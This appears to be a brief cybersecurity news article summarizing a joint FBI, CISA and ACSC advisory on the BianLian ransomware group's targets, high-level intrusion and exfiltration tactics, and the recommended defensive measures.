FBI, CISA, and ACSC Expose BianLian Ransomware Group’s Tactics
The FBI, in collaboration with CISA and the Australian Cyber Security Centre (ACSC), has issued an advisory detailing the tactics, techniques, and procedures (TTPs) as well as indicators of compromise (IOCs) associated with the BianLian group. This group is notorious for developing and deploying ransomware and engaging in extortion campaigns.
Active since 2022, BianLian Ransomware Group has targeted critical infrastructure sectors in the United States and Australia, including professional services firms and the construction industry. Initially, the group employed a dual extortion strategy, encrypting data while threatening its public release. However, starting in January 2023, their focus shifted entirely to data theft and extortion without encryption, with encryption being entirely abandoned by January 2024.
To infiltrate networks, BianLian ransomware exploits stolen RDP credentials and vulnerabilities such as ProxyShell. Once inside, they deploy remote administration tools and establish command-and-control channels using tools like Ngrok and Rsocks. Privilege escalation is achieved through the exploitation of CVE-2022-37969, a vulnerability in the Windows CLFS driver rated 7.8 on the CVSS scale.
The group employs obfuscation techniques to evade detection, utilizing PowerShell and Windows Command Shell to disable antivirus solutions and security defenses. Network reconnaissance is conducted using tools like Advanced Port Scanner, alongside scripts designed to harvest credentials and Active Directory data.
BianLian exfiltrates sensitive files through PowerShell scripts that locate, compress, and transfer data via FTP, Rclone, or the Mega service. To intensify pressure on their victims, they distribute ransom notes to corporate printers or directly contact employees by phone.
The FBI, CISA, and ACSC urge organizations to implement the recommended measures to mitigate the risk of such attacks. Key actions include auditing remote access configurations, enforcing strict network segmentation, adopting multi-factor authentication (MFA), and ensuring regular system updates. Additionally, maintaining data backups and routinely testing defensive mechanisms against the outlined adversarial techniques are strongly advised.
